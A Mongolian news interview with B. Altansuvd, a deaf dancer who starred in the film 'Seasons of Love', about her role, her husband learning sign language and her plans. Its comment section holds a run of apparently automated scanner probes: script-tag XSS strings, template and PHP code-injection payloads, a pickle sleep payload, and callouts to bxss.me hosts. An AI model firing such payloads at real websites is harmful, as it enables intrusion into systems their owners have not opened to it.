Б.Алтансувд: Хань минь, миний төлөө дохионы хэл сурсан
2021-01-10 16:31

“Авьяаслаг Монголчууд” шоуны тайзнаа хөгжмийн хэмнэлд гайхалтай уран бүжгийн үзүүлбэрийг үзүүлж дөрвөн шүүгчээс тэнцлээ гэсэн хариу аван инээмсэглэн зогссон сурагч охин Б.Алтансувдыг бид эчнээ танина.

 

Cургуулиа төгсөөд Соёл Урлагийн Их сургуульд бүжигчин мэргэжлээр суралцахыг хүссэн ч сонсголгүй гэсэн шалтгаанаар өөрийн багын мөрөөдлөө биелүүлж чадалгүй, сонирхолоо дагаж хувцас дизайны мэргэжлээр суралцжээ. Гэсэн ч тэрбээр урлагийн хүн болох мөрөөдлөө орхиогүй бөгөөд саяхан нээлтээ хийсэн “Seasons of Love” кино контентод гол дүрд тоглож, уг кинонд өөрийн бүжиглэх чадвараа ч давхар харуулсан байна.

 

Тэрбээр “Монголд анх удаа сонсголын тусгай хэрэгцээт иргэн киноны гол дүрд тоглосон явдал байж магадгүй. Мөн кино бүх хүмүүст зориулагдсан бөгөөд сонсголын тусгай хэрэгцээт иргэд хүлээн авч үзэх боломжтой гэдгээрээ онцлог. Энэ кинонд тоглосон нь өөртөө итгэх итгэлийг минь нэмээд зогсохгүй киног үзэж байгаа сонсголын тусгай хэрэгцээт иргэдэд бас нэгэн итгэл болох байх гэж найдаж байна” хэмээсэн юм. Ингээд түүнтэй ярилцсанаа хүргэе. 

 

 

-Анхны кинондоо амжилттай тоглосон таньд баяр хүргэе. Сэтгэгдлээсээ хуваалцаж болох уу?

 

-“Seasons of Love” кино нь хүмүүсийн ялгаатай хайр дурлалын харилцааг нэг цаг хугацаа, нэг орон зайд харуулж чадсан гэдгээрээ онцлог. Би сонсголын тусгай хэрэгцээт бүсгүйн дүрд тоглосон. Дурлалт залуутайгаа ойлголцож чадахгүй байгааг харуулдаг. Хүмүүс нэг нэгэндээ өөрсдийгөө ойлгуулж чадахгүй байна гэдэг их хэцүү л дээ. Үүнийг тод харна гэж бодож байна. Киноны талаар илүү дэлгэрэнгүй мэдэхийг хүсвэл бүх IPTV-гээр үзэх боломжтой. Мэргэжлийн жүжигчин биш учир хэцүү зүйл их байсан. Тэр бүхэнд кино багийн хамт олон тусалж, дэмжиж зааж чиглүүлж өгсөнд баярлаж байна. Ялангуяа кинонд хамтран тоглосон, надад жүжиглэх талаар зааж өгсөн Т.Энэрэл эгчид баярлалаа гэж онцгойлон хэлмээр байна.

 

Кино баг дандаа залуу уран бүтээлчдээс бүрдсэн учир ойлголцоход ч амар байсан. Манай найруулагч О.Итгэл дохионы хэл мэдэхгүй учир надтай ойлголцохын тулд хичээнгүйлэн бичгээр харилцаж, заримдаа эв хавгүй инээдтэй хөдөлгөөн хийж байсан нь маш хөгжилтэй бас талархмаар байсан. Ширүүн царайтай ч их хөгжилтэй, хүүхэд шиг хүн. Надтай ойлголцох гэж хачин сонин хөдөлгөөнүүд маш их хийсэн дээ. (инээв) Мөн анх кинонд тоглох саналыг тавьж надтай холбогдсон З.Нямзул продюсерт баярлалаа. Би продюсертайгаа уулзахаар ганцаараа очсон. Тэгээд бид хоёр ярилцаж чадахгүй болохоороо өөд өөдөөсөө харж суугаад фэйсбүүкийн мессенжерээ ашигласан. Энэ мэт кино эхлэхээс дуусах хүртэл намайг дэмжиж, зааж чиглүүлж, хамтран ажилласан баг хамт олондоо үнэхээр баярлалаа.

 

 

-Үзэгчид энэ киног яагаад үзэх хэрэгтэй гэж та бодож байна вэ?

 

-Би багаасаа сонсголын тусгай хэрэгцээтэй байсан. Монголд сонсголын тусгай хэрэгцээт иргэдэд зориулсан кино, контент их цөөхөн л дөө. Тиймээс сургуульд орохоос өмнө маш их ганцаарддаг, хүмүүстэй ойлголцож чаддаггүй байсан нь хэцүү байсан. Тэр үед сонсголын бэрхшээлтэй охины тухай солонгос кино үзэж байсан нь мартагддаггүй. Киноны нэрийг нь олоогүй. Гэхдээ тэр кино сэтгэлд минь маш хүчтэй нөлөөлсөн. Яагаад ч юм би ганцаараа биш юм шиг мэдрэмж төрсөн. Надад тохиолддог асуудлууд тэр киноны гол дүр сонсголгүй охинд ч тохиолдож байсан. Тэр солонгос кино хүмүүст өөр, өөр мэдрэмжийг өгсөн байх. Тэгэхээр киног яагаад үзэх хэрэгтэй вэ гэдэг нь ч хүн бүрийн хувьд өөр гэж бодож байна. Залуучуудын бүтээсэн контент учир алдаа, оноо байгааг үгүйсгэхгүй. Гэхдээ кинонаас хүн бүрт тохиодог хайр дурлал, хүмүүсийн харилцааны талаар олж харж чадна. Мөн “Seasons of Love” кино контент сонсголын бэрхшээлтэй иргэдэд, хүүхдүүдэд нэг итгэл болно байх гэж найдаж байна. Би уг кинонд тоглохоос өмнө сонсголын бэрхшээлтэй учир бүжигчин мэргэжлээр суралцаж чадаагүй. Гэхдээ л энэ нь миний мөрөөдлийг үгүйсгэх шалтгаан биш юм байна гэдгийг кинонд тоглосноороо ойлгосон. Анх яанаа, яаж кинонд тоглох вэ, би чадах болов уу гэж айж байсан. Одоо илүү зоригтой, хичээвэл бүх зүйл боломжтой гэдэгт итгэж байна.

 

-Кино хайр дурлалын талаар гэсэн. Та хайрын талаарх бодлоо хуваалцаж болох уу?

 

-Хайр гэж юу вэ гэвэл би мэдэхгүй. Би нөхөртэйгөө танилцсан түүхээ хуваалцвал манай үеэл дүүгийн найз дүүтэйгээ авахуулсан зургийг маань хараад надтай танилцахыг хүсч холбогдож байсан. Тэгээд 5 сар гаруйн хугацаанд “сайн уу”, “сайн” гээд л чаталсан. Нөхөр маань дохионы хэл мэдэхгүй учраас илүү их зүйл ярилцаж чаддаггүй байсан ч тэр үе надад маш гоё санагддаг байсан. Дараа бид анх удаа болзоод Сүхбаатарын талбай дээр уулзахад намайг ямар жижигхэн юм бэ гээд шоолоод инээж байсан нь хөгжилтэй байсан. Хайр гэдэг магадгүй нэг нэгнээ хүндлэх, халамжлах, хамтдаа аз жаргалаар дүүрэн байхыг хэлдэг байх. Нөхөр маань миний төлөө бас хайрынхаа төлөө дохионы хэл сурсан. Намайг үргэлж дэмжиж, урам зориг, эрч хүч өгдөг хайртай ханьдаа баярлалаа гэж хэлмээр байна. Одоо бид гурван настай хүүхэдтэй. Би өдөр бүр амьдрал ямар сайхан юм бэ гэж боддог.

 

 

-Таны цаашдын зорилго, төлөвлөгөө юу вэ?

 

-Одоо хүүхдээ харж, урландаа ажиллаж байна. Ковид бидний амьдралд маш хүчтэй нөлөө үзүүлчихлээ. Би энэ бүхэн хурдан дуусч хүмүүс өмнөх чөлөөтэй амьдралын хэв маягтаа ороосой гэж хүсч байна. Гэртээ удаан байх нь тийм ч таатай биш, уйтгартай байна. Хэрвээ та уйдвал манай киног үзэж болно шүү. Бид киногоо зун, хорио цээрийн дэглэм байхгүй үед хийсэн. Харин цаашдын зорилго гэвэл би хорио цээрийн үе дуусвал уран нугаралтаараа хичээллэж, тэмцээн уралдаанд оролцохыг төлөвлөж байгаа. Мөн сонсголын тусгай хэрэгцээт иргэдэд зориулсан жүжиг, кинонд ажиллаж магадгүй. Кинонд тоглох нь надад маш их таалагдсан. Урам зориг, итгэл өгсөн.

 

-Бидэнтэй ярилцсан танд баярлалаа. Амжилт хүсье.

 

 

-Миний тоглосон киног хамгийн их үзэхийг хүсч байгаа, хүлээж байгаа хүмүүс нь аав, ээж хоёр маань. Энэ боломжийг ашиглаад хамгаас хайртай аав, ээж хоёртоо намайг дэмжиж, хайрлаж өсгөсөнд баярлалаа гэж хэлмээр байна. Мөн уншигчдад эрүүл мэндээ хамгаалж гараа сайн угааж, маскаа тогтмол зүүгээрээ гэж хэлье.

 

-Баярлалаа. Танд сайн сайхныг хүсье!

 

Shuud.mn
Сонин хачин
hnuXBVZl:
%0D%0A%3C%53%63%52%69%50%74%20%3E%41%58%66%74%289617%29%3C%2F%73%43%72%69%70%54%3E
2021-01-22
hnuXBVZl:
\u003CScRiPt\AXft(9569)\u003C/sCripT\u003E
2021-01-22
hnuXBVZl:
2021-01-22
hnuXBVZl:
<ScRiPt >AXft(9274)
2021-01-22
hnuXBVZl:
9707835
2021-01-22
hnuXBVZl:
acu9253<s1﹥s2ʺs3ʹuca9253
2021-01-22
hnuXBVZl:
acux8627��z1��z2a�bcxuca8627
2021-01-22
hnuXBVZl:
{{49710*49018}}
2021-01-22
hnuXBVZl:
@{50380*50309}
2021-01-22
hnuXBVZl:
/\xfs.bxss.me
2021-01-22
hnuXBVZl:
'"
2021-01-22
hnuXBVZl:
".gethostbyname(lc("hitgl"."hbkrvovp5829d.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(77).chr(113).chr(90)."
2021-01-22
hnuXBVZl:
/xfs.bxss.me
2021-01-22
hnuXBVZl:
953851
2021-01-22
hnuXBVZl:
http://xfs.bxss.me
2021-01-22
hnuXBVZl:
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2021-01-22
hnuXBVZl:
//xfs.bxss.me
2021-01-22
hnuXBVZl:
'.print(md5(31337)).'
2021-01-22
hnuXBVZl:
!(()&&!|*|*|
2021-01-22
hnuXBVZl:
^(#$!@#$)(()))******
2021-01-22
hnuXBVZl:
ctime sleep p0 (I30 tp1 Rp2 .
2021-01-22
hnuXBVZl:
'.gethostbyname(lc('hitqr'.'pxywswwf2ed02.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(87).chr(121).chr(80).'
2021-01-22
hnuXBVZl:
;print(md5(31337));
2021-01-22
hnuXBVZl:
';print(md5(31337));$a='
2021-01-22
hnuXBVZl:
";print(md5(31337));$a="
2021-01-22
hnuXBVZl:
${@print(md5(31337))}
2021-01-22
hnuXBVZl:
${@print(md5(31337))}\
2021-01-22
hnuXBVZl:
)
2021-01-22
hnuXBVZl:
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
2021-01-22
hnuXBVZl:
1some_inexistent_file_with_long_name.jpg
2021-01-22